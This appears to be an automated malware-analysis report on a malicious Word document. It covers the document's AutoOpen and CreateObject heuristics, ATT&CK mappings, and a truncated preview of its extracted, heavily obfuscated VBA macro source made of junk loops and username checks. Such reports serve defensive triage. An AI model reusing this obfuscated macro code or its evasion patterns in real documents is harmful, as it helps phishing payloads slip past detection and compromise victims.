Verdict: MALICIOUS
Risk Score: 162

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a malicious VBA macro. The AutoOpen macro is triggered upon opening, and the CreateObject heuristic indicates it attempts to instantiate and execute objects. This suggests the macro is designed to download and execute a second-stage payload, a common technique for initial compromise via spearphishing attachments.
Heuristics (6)

- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro.
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call.
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 68836 bytes |

SHA-256: e568284d567562050a68e3b984d14816ac4fe985f94cb75ec2636ba4c92f5b80

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "yhjrUGkT0"
Public Function RsBDik4(ByRef rIhQ4iPMLM As String, ByVal bM85Flk As String) As String
Dim AVkLV9S9Az() As Byte
If Application.UserName = "NU0jymmayC4" Then
MsgBox ("GSOhfpfv50R")
Else
Dim gT2fzuPvMVYaGs As String
gT2fzuPvMVYaGs = Application.UserName
End If
If Len(Application.UserName) < 168 Then
Dim eBxe7G0h As Collection
End If
If Len(Application.UserName) < 723 Then
Dim vbtXRQIp As Collection
End If
If Len(Application.UserName) < 228 Then
Dim L5qSVQTB As Collection
End If
Dim UJNzHYsk() As Byte
Dim NeWTECN As String
For v1Oz7kPGi = 0 To 6
NeWTECN = NeWTECN + "d"
Next v1Oz7kPGi
For kKenO4ZE = 0 To 9
bDM1ZdG = bDM1ZdG + kKenO4ZE
Next kKenO4ZE
Dim gIcleJoDR1 As Long
For Ubgx6f = 7 To 15
gIcleJoDR1 = gIcleJoDR1 + Ubgx6f
Next Ubgx6f
Dim HGLTiUG9 As String
HGLTiUG9 = Application.UserName
Dim xZ6KxGErVL As Collection
Dim t6LZbvbq As Integer
While Len(HGLTiUG9) > 7
t6LZbvbq = t6LZbvbq + 9
ZNrXOP = Len(HGLTiUG9) - 8
Wend
Dim eEt1UVE As String
eEt1UVE = Application.UserName
Dim B7aOgleId As Collection
Dim q5Kx20 As Integer
While Len(eEt1UVE) > 9
q5Kx20 = q5Kx20 + 8
F6XZzI = Len(eEt1UVE) - 6
Wend
Dim nkm09CMc As Long
Dim jEwsJL41, YNRGtBylA As Integer
jEwsJL41 = 6 + 6
For tnh1DE = 0 To 6
YNRGtBylA = YNRGtBylA + tnh1DE
Next tnh1DE
If YNRGtBylA < tnh1DE Then
Dim upTO83YNXe As Long
End If
Dim OO1XwV As Long
For y3FeF5c16x = 6 To 13
OO1XwV = OO1XwV + y3FeF5c16x
Next y3FeF5c16x
Dim Wx4vAD7 As String
For I2FAoKGYaK = 0 To 6
Wx4vAD7 = Wx4vAD7 + "c"
Next I2FAoKGYaK
Dim c7C61H As String
For xPsVWJWF = 0 To 6
c7C61H = c7C61H + "H"
Next xPsVWJWF
Dim Z13QTeABMm As String
Z13QTeABMm = Application.UserName
Dim Al6Ay6s As Collection
Dim Ovg28jDm As Integer
While Len(Z13QTeABMm) > 7
Ovg28jDm = Ovg28jDm + 7
qM4tOaqJ = Len(Z13QTeABMm) - 8
Wend
Dim pOXVylrY As String
pOXVylrY = Application.UserName
Dim DtvnDhvHl6 As Collection
Dim MVvDgrp As Integer
While Len(pOXVylrY) > 6
MVvDgrp = MVvDgrp + 8
JXi2q4faMW = Len(pOXVylrY) - 8
Wend
If Application.UserName = "kozZy7iUr6d" Then
MsgBox ("c3AoLvsi1vr")
Else
Dim jd3ghWXSaXYeRG As String
jd3ghWXSaXYeRG = Application.UserName
End If
Dim qyoMRliO As Long
Dim cwgMW9C, VL3lJEyVm As Integer
cwgMW9C = 6 + 9
For TRysSt = 0 To 7
VL3lJEyVm = VL3lJEyVm + TRysSt
Next TRysSt
If VL3lJEyVm < TRysSt Then
Dim e2l7Kb6e As Long
End If
Dim GzmWyR7dY As String
For ggeODn = 0 To 7
GzmWyR7dY = GzmWyR7dY + "h"
Next ggeODn
If Len(Application.UserName) < 794 Then
Dim VSlZPiRfoG As Collection
End If
If Application.UserName = "CVEaVFB74Mo" Then
MsgBox ("sx6Hcr0sQJh")
Else
Dim bk7pi2K9BSORNi As String
bk7pi2K9BSORNi = Application.UserName
End If
Dim NlUW6FgLxLH As Long
Dim PuOAjiW0qi, dyg55xw As Integer
PuOAjiW0qi = 7 + 9
For qhXcyJozRW = 0 To 6
dyg55xw = dyg55xw + qhXcyJozRW
Next qhXcyJozRW
If dyg55xw < qhXcyJozRW Then
Dim fDKcGB4 As Long
End If
Dim YRFxlvDYJd As String
For aLfz32 = 0 To 8
YRFxlvDYJd = YRFxlvDYJd + "X"
Next aLfz32
If Len(Application.UserName) < 328 Then
Dim bmVCldi As Collection
End If
Dim aJBbefimde As String
aJBbefimde = Application.UserName
Dim zsoDoUMtVq As Collection
Dim RcvtIg As Integer
While Len(aJBbefimde) > 9
RcvtIg = RcvtIg + 8
WfdRyzLd = Len(aJBbefimde) - 5
Wend
Dim GKNcLb9LcQ0 As Long
Dim CiUk3J As String
For RIab8UtETL = 0 To 9
CiUk3J = CiUk3J + "m"
Next RIab8UtETL
Dim fVRza9rUvF As Long
For GCc7SxQS = 8 To 16
fVRza9rUvF = fVRza9rUvF + GCc7SxQS
Next GCc7SxQS
Dim jbWkwct, wFz4lu As Integer
jbWkwct = 6 + 5
For yewGeI = 0 To 9
wFz4lu = wFz4lu + yewGeI
Next yewGeI
If wFz4lu < yewGeI Then
Dim aOItBxcV7 As Long
End If
Dim xV7bqbp, Ka1usH As Integer
xV7bqbp = 8 + 8
For Q3EQaQ = 0 To 8
Ka1usH = Ka1usH + Q3EQaQ
Next Q3EQaQ
If Ka1usH < Q3EQaQ T
... (truncated)